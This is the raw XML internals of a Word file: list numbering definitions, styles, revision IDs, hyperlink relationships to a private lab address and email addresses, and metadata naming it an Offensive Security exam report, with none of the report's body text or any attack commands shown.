    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="6818E31E">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5859" w:hanging="176"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="876E08B0">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6725" w:hanging="176"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="B4D0FEE4">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7592" w:hanging="176"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="3A7C56F3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EA2079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76669"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="164CE22A"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="543" w:hanging="427"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Source Sans 3" w:eastAsia="Source Sans 3" w:hAnsi="Source Sans 3" w:cs="Source Sans 3" w:hint="default"/>
        <w:b/>
        <w:bCs/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:spacing w:val="0"/>
        <w:w w:val="101"/>
        <w:sz w:val="41"/>
        <w:szCs w:val="4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4" w:hanging="537"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Source Sans 3" w:eastAsia="Source Sans 3" w:hAnsi="Source Sans 3" w:cs="Source Sans 3" w:hint="default"/>
        <w:b/>
        <w:bCs/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:color w:val="272727"/>
        <w:spacing w:val="0"/>
        <w:w w:val="10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5" w:hanging="648"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Source Sans 3" w:eastAsia="Source Sans 3" w:hAnsi="Source Sans 3" w:cs="Source Sans 3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91" w:hanging="775"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Source Sans 3" w:eastAsia="Source Sans 3" w:hAnsi="Source Sans 3" w:cs="Source Sans 3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103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07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10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14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18" w:hanging="775"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="45650874"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E314123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8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96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3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04" w:hanging="1800"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="4B606121"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="06AA0508"/>
    <w:lvl w:ilvl="0" w:tplc="48125624">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="662" w:hanging="176"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Source Sans 3" w:eastAsia="Source Sans 3" w:hAnsi="Source Sans 3" w:cs="Source Sans 3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09BA8D04">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1526" w:hanging="176"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="4D3ED038">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2393" w:hanging="176"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="8794A562">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3259" w:hanging="176"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="26F862E4">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4126" w:hanging="176"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="253E13F6">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4992" w:hanging="176"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="287C62BE">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5859" w:hanging="176"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="7AF68E22">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6725" w:hanging="176"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="23AA7AD2">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7592" w:hanging="176"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="5C4F1A59"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F922527A"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="444" w:hanging="328"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Source Sans 3" w:eastAsia="Source Sans 3" w:hAnsi="Source Sans 3" w:cs="Source Sans 3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2" w:hanging="502"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Source Sans 3" w:eastAsia="Source Sans 3" w:hAnsi="Source Sans 3" w:cs="Source Sans 3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4" w:hanging="699"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Source Sans 3" w:eastAsia="Source Sans 3" w:hAnsi="Source Sans 3" w:cs="Source Sans 3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539" w:hanging="895"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Source Sans 3" w:eastAsia="Source Sans 3" w:hAnsi="Source Sans 3" w:cs="Source Sans 3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509" w:hanging="8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78" w:hanging="8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8" w:hanging="8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7" w:hanging="8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6" w:hanging="895"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="648342CE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3BF6A7D6"/>
    <w:lvl w:ilvl="0" w:tplc="450EB2DE">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="662" w:hanging="176"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Source Sans 3" w:eastAsia="Source Sans 3" w:hAnsi="Source Sans 3" w:cs="Source Sans 3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96388026">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1526" w:hanging="176"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="B860CC52">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2393" w:hanging="176"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="1CDEC374">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3259" w:hanging="176"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="C658A832">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4126" w:hanging="176"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="06F43AF2">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4992" w:hanging="176"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="BD5E3ECC">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5859" w:hanging="176"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="8584902A">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6725" w:hanging="176"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="40C6419A">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7592" w:hanging="176"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="68822119"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="337A5F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0A5355"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="56D0E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619544">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="449788274">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1382560548">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1533767848">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="374701287">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="911618444">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1616904597">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1887257834">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="11834687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11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4D8F"/>
    <w:rsid w:val="000074DB"/>
    <w:rsid w:val="00010E23"/>
    <w:rsid w:val="000368F1"/>
    <w:rsid w:val="00043515"/>
    <w:rsid w:val="00045B30"/>
    <w:rsid w:val="00057A80"/>
    <w:rsid w:val="00082748"/>
    <w:rsid w:val="000A3969"/>
    <w:rsid w:val="000A72F0"/>
    <w:rsid w:val="000B09A9"/>
    <w:rsid w:val="000C6E55"/>
    <w:rsid w:val="000D0310"/>
    <w:rsid w:val="000D2579"/>
    <w:rsid w:val="00100DA0"/>
    <w:rsid w:val="00103948"/>
    <w:rsid w:val="001041B3"/>
    <w:rsid w:val="00113B53"/>
    <w:rsid w:val="00122D38"/>
    <w:rsid w:val="0013128A"/>
    <w:rsid w:val="001360F1"/>
    <w:rsid w:val="00140DA8"/>
    <w:rsid w:val="00166F7E"/>
    <w:rsid w:val="001735FB"/>
    <w:rsid w:val="001765F9"/>
    <w:rsid w:val="00177F82"/>
    <w:rsid w:val="00185827"/>
    <w:rsid w:val="00193A28"/>
    <w:rsid w:val="001A2E34"/>
    <w:rsid w:val="001C0F67"/>
    <w:rsid w:val="001D1E08"/>
    <w:rsid w:val="001E7627"/>
    <w:rsid w:val="001F2EB2"/>
    <w:rsid w:val="001F69F9"/>
    <w:rsid w:val="0020265B"/>
    <w:rsid w:val="00220239"/>
    <w:rsid w:val="002275ED"/>
    <w:rsid w:val="0023331B"/>
    <w:rsid w:val="002345F9"/>
    <w:rsid w:val="00241FAC"/>
    <w:rsid w:val="00242B35"/>
    <w:rsid w:val="00243C71"/>
    <w:rsid w:val="002449DE"/>
    <w:rsid w:val="002505A3"/>
    <w:rsid w:val="00250933"/>
    <w:rsid w:val="00250E46"/>
    <w:rsid w:val="002620CB"/>
    <w:rsid w:val="002648AD"/>
    <w:rsid w:val="00274241"/>
    <w:rsid w:val="00275E2C"/>
    <w:rsid w:val="00294DFE"/>
    <w:rsid w:val="002B26A7"/>
    <w:rsid w:val="002B4F8C"/>
    <w:rsid w:val="002B5C4D"/>
    <w:rsid w:val="002B6087"/>
    <w:rsid w:val="002D26CB"/>
    <w:rsid w:val="002D2FA1"/>
    <w:rsid w:val="002E17BE"/>
    <w:rsid w:val="002F46FB"/>
    <w:rsid w:val="00311C06"/>
    <w:rsid w:val="003157E0"/>
    <w:rsid w:val="00315815"/>
    <w:rsid w:val="00342725"/>
    <w:rsid w:val="00363AEC"/>
    <w:rsid w:val="00363D51"/>
    <w:rsid w:val="00365260"/>
    <w:rsid w:val="003674F1"/>
    <w:rsid w:val="00374124"/>
    <w:rsid w:val="00395AD1"/>
    <w:rsid w:val="00395F20"/>
    <w:rsid w:val="003A30FC"/>
    <w:rsid w:val="003A66EF"/>
    <w:rsid w:val="003B19AE"/>
    <w:rsid w:val="003C7C21"/>
    <w:rsid w:val="003D0C4C"/>
    <w:rsid w:val="003D7B6B"/>
    <w:rsid w:val="003F2DA7"/>
    <w:rsid w:val="00401B5D"/>
    <w:rsid w:val="0040494A"/>
    <w:rsid w:val="004072F9"/>
    <w:rsid w:val="00414C35"/>
    <w:rsid w:val="0042172C"/>
    <w:rsid w:val="004251A9"/>
    <w:rsid w:val="0043441D"/>
    <w:rsid w:val="00442C46"/>
    <w:rsid w:val="00445621"/>
    <w:rsid w:val="0045640C"/>
    <w:rsid w:val="00460586"/>
    <w:rsid w:val="00476065"/>
    <w:rsid w:val="00481C48"/>
    <w:rsid w:val="00481F3D"/>
    <w:rsid w:val="00493839"/>
    <w:rsid w:val="00497FC5"/>
    <w:rsid w:val="004A00C8"/>
    <w:rsid w:val="004A5319"/>
    <w:rsid w:val="004A5FC0"/>
    <w:rsid w:val="004B6D23"/>
    <w:rsid w:val="004C1C79"/>
    <w:rsid w:val="004E414A"/>
    <w:rsid w:val="004E5478"/>
    <w:rsid w:val="004E5823"/>
    <w:rsid w:val="004E7358"/>
    <w:rsid w:val="004F7DC1"/>
    <w:rsid w:val="00507EA7"/>
    <w:rsid w:val="00534DC7"/>
    <w:rsid w:val="00555729"/>
    <w:rsid w:val="00562A13"/>
    <w:rsid w:val="005749AA"/>
    <w:rsid w:val="0058074A"/>
    <w:rsid w:val="00590794"/>
    <w:rsid w:val="005A0441"/>
    <w:rsid w:val="005A4030"/>
    <w:rsid w:val="005C1B40"/>
    <w:rsid w:val="005D4D8F"/>
    <w:rsid w:val="006047F0"/>
    <w:rsid w:val="0060792C"/>
    <w:rsid w:val="00610522"/>
    <w:rsid w:val="006226A1"/>
    <w:rsid w:val="0062761E"/>
    <w:rsid w:val="006304A0"/>
    <w:rsid w:val="00643298"/>
    <w:rsid w:val="0065003A"/>
    <w:rsid w:val="00650D84"/>
    <w:rsid w:val="00681BDE"/>
    <w:rsid w:val="00681C1D"/>
    <w:rsid w:val="00683920"/>
    <w:rsid w:val="006A1EFC"/>
    <w:rsid w:val="006A5439"/>
    <w:rsid w:val="006B0985"/>
    <w:rsid w:val="006C5402"/>
    <w:rsid w:val="00702ED8"/>
    <w:rsid w:val="007039F6"/>
    <w:rsid w:val="00710231"/>
    <w:rsid w:val="00726603"/>
    <w:rsid w:val="0073529E"/>
    <w:rsid w:val="00744D2A"/>
    <w:rsid w:val="007515D3"/>
    <w:rsid w:val="00754CCE"/>
    <w:rsid w:val="0076527C"/>
    <w:rsid w:val="007738D6"/>
    <w:rsid w:val="007810C1"/>
    <w:rsid w:val="00783708"/>
    <w:rsid w:val="00796B35"/>
    <w:rsid w:val="007A27D8"/>
    <w:rsid w:val="007A3DC4"/>
    <w:rsid w:val="007A7F50"/>
    <w:rsid w:val="007B2690"/>
    <w:rsid w:val="007C0A63"/>
    <w:rsid w:val="007C4D61"/>
    <w:rsid w:val="00811643"/>
    <w:rsid w:val="008118CE"/>
    <w:rsid w:val="00815CEA"/>
    <w:rsid w:val="008259E6"/>
    <w:rsid w:val="0083239E"/>
    <w:rsid w:val="00881784"/>
    <w:rsid w:val="008B563D"/>
    <w:rsid w:val="008D5318"/>
    <w:rsid w:val="008E3865"/>
    <w:rsid w:val="008E63F7"/>
    <w:rsid w:val="00904207"/>
    <w:rsid w:val="00910646"/>
    <w:rsid w:val="00946A86"/>
    <w:rsid w:val="0095105D"/>
    <w:rsid w:val="00977BF5"/>
    <w:rsid w:val="00981BAA"/>
    <w:rsid w:val="00990616"/>
    <w:rsid w:val="00990C09"/>
    <w:rsid w:val="00991238"/>
    <w:rsid w:val="00996FB1"/>
    <w:rsid w:val="009B11A4"/>
    <w:rsid w:val="009B2388"/>
    <w:rsid w:val="009D173F"/>
    <w:rsid w:val="009D1BE9"/>
    <w:rsid w:val="009D6821"/>
    <w:rsid w:val="009D7E18"/>
    <w:rsid w:val="009E32B3"/>
    <w:rsid w:val="009E372A"/>
    <w:rsid w:val="009E74F0"/>
    <w:rsid w:val="00A04182"/>
    <w:rsid w:val="00A1626E"/>
    <w:rsid w:val="00A23528"/>
    <w:rsid w:val="00A2727A"/>
    <w:rsid w:val="00A327BA"/>
    <w:rsid w:val="00A33F5E"/>
    <w:rsid w:val="00A70E0A"/>
    <w:rsid w:val="00A83E1A"/>
    <w:rsid w:val="00A87974"/>
    <w:rsid w:val="00A920F7"/>
    <w:rsid w:val="00A94354"/>
    <w:rsid w:val="00A972CF"/>
    <w:rsid w:val="00A9785D"/>
    <w:rsid w:val="00AA0DD9"/>
    <w:rsid w:val="00AA7627"/>
    <w:rsid w:val="00AB585A"/>
    <w:rsid w:val="00AB5ED1"/>
    <w:rsid w:val="00AC012D"/>
    <w:rsid w:val="00AC4CC1"/>
    <w:rsid w:val="00AD02B7"/>
    <w:rsid w:val="00AD1049"/>
    <w:rsid w:val="00AE10B5"/>
    <w:rsid w:val="00AF43E3"/>
    <w:rsid w:val="00AF6125"/>
    <w:rsid w:val="00B10C9A"/>
    <w:rsid w:val="00B14637"/>
    <w:rsid w:val="00B36BFC"/>
    <w:rsid w:val="00B5601C"/>
    <w:rsid w:val="00B951C0"/>
    <w:rsid w:val="00BA2EAC"/>
    <w:rsid w:val="00BA4141"/>
    <w:rsid w:val="00BB3F12"/>
    <w:rsid w:val="00BC15F6"/>
    <w:rsid w:val="00BC4615"/>
    <w:rsid w:val="00BE2034"/>
    <w:rsid w:val="00BE238E"/>
    <w:rsid w:val="00BE276F"/>
    <w:rsid w:val="00BF6993"/>
    <w:rsid w:val="00C11FA1"/>
    <w:rsid w:val="00C32BE4"/>
    <w:rsid w:val="00C554F0"/>
    <w:rsid w:val="00C740BB"/>
    <w:rsid w:val="00C76789"/>
    <w:rsid w:val="00C9122D"/>
    <w:rsid w:val="00C95DC8"/>
    <w:rsid w:val="00CB3155"/>
    <w:rsid w:val="00CB37AA"/>
    <w:rsid w:val="00CD26F8"/>
    <w:rsid w:val="00CE1771"/>
    <w:rsid w:val="00D024BD"/>
    <w:rsid w:val="00D167AE"/>
    <w:rsid w:val="00D319A6"/>
    <w:rsid w:val="00D35DFA"/>
    <w:rsid w:val="00D52F03"/>
    <w:rsid w:val="00D87133"/>
    <w:rsid w:val="00D970F5"/>
    <w:rsid w:val="00DB4D6B"/>
    <w:rsid w:val="00DC0976"/>
    <w:rsid w:val="00DC6855"/>
    <w:rsid w:val="00DE502C"/>
    <w:rsid w:val="00E047E4"/>
    <w:rsid w:val="00E213EB"/>
    <w:rsid w:val="00E32CE4"/>
    <w:rsid w:val="00E7362D"/>
    <w:rsid w:val="00E86FCA"/>
    <w:rsid w:val="00EB4687"/>
    <w:rsid w:val="00EB6E69"/>
    <w:rsid w:val="00EC3929"/>
    <w:rsid w:val="00F07B23"/>
    <w:rsid w:val="00F1400E"/>
    <w:rsid w:val="00F27B36"/>
    <w:rsid w:val="00F32AEC"/>
    <w:rsid w:val="00F353C8"/>
    <w:rsid w:val="00F76F73"/>
    <w:rsid w:val="00F9792D"/>
    <w:rsid w:val="00FA2299"/>
    <w:rsid w:val="00FB165B"/>
    <w:rsid w:val="00FB45A1"/>
    <w:rsid w:val="00FC621F"/>
    <w:rsid w:val="00FD6AB2"/>
    <w:rsid w:val="00FE067D"/>
    <w:rsid w:val="00FE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BE95B"/>
  <w15:docId w15:val="{A4230966-75DB-4AD2-BA57-5037CEE6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ource Sans 3" w:eastAsia="Source Sans 3" w:hAnsi="Source Sans 3" w:cs="Source Sans 3"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:pPr>
      <w:ind w:left="542" w:hanging="425"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="41"/>
      <w:szCs w:val="41"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:ind w:left="653" w:hanging="5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374"/>
      <w:ind w:left="764" w:hanging="64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17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0"/>
      <w:ind w:left="444" w:hanging="327"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="12"/>
      <w:ind w:left="946" w:hanging="502"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC3">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="12"/>
      <w:ind w:left="1644" w:hanging="698"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC4">
    <w:name w:val="toc 4"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="12"/>
      <w:ind w:left="2539" w:hanging="895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2"/>
      <w:ind w:left="662" w:hanging="175"/>
    </w:pPr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character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00FE06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67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96B35"/>
    <w:rPr>
      <w:rFonts w:ascii="Source Sans 3" w:eastAsia="Source Sans 3" w:hAnsi="Source Sans 3" w:cs="Source Sans 3"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="004605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586"/>
    <w:rPr>
      <w:rFonts w:ascii="Source Sans 3" w:eastAsia="Source Sans 3" w:hAnsi="Source Sans 3" w:cs="Source Sans 3"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="004605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586"/>
    <w:rPr>
      <w:rFonts w:ascii="Source Sans 3" w:eastAsia="Source Sans 3" w:hAnsi="Source Sans 3" w:cs="Source Sans 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hyperlink" Target="http://192.168.1.211" TargetMode="External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yperlink" Target="http://192.168.1.211/secret/wp-login.php" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:jparki31@lakers.mercyhurst.edu," TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:marlinspike@192.168.1.21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hyperlink" Target="http://192.168.1.211/secr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http://vtcsec/secret" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.1.211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hyperlink" Target="http://192.168.1.211/secret" TargetMode="External"/><Relationship Id="rId27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mailto:Jparki31@lakers.mercyhurst.edu" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:Jparki31@lakers.mercyhurs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2303</Words>
  <Characters>13131</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>109</Lines>
  <Paragraphs>30</Paragraphs>
  <ScaleCrop>false</ScaleCrop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Offensive Security Certified Professional Exam Report</dc:title>
  <dc:subject>Markdown</dc:subject>
  <dc:creator>student@youremailaddress.com; OSID: XXXX</dc:creator>
  <cp:keywords>Markdown, Example</cp:keywords>
  <cp:lastModifiedBy>James Parkinson</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-12-11T00:17:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-12-11T00:17:00Z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2020-07-25T00:00:00Z</vt:filetime>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="Creator">
    <vt:lpwstr>LaTeX via pandoc with the Eisvogel template</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="LastSaved">
    <vt:filetime>2023-12-08T00:00:00Z</vt:filetime>
  </property>
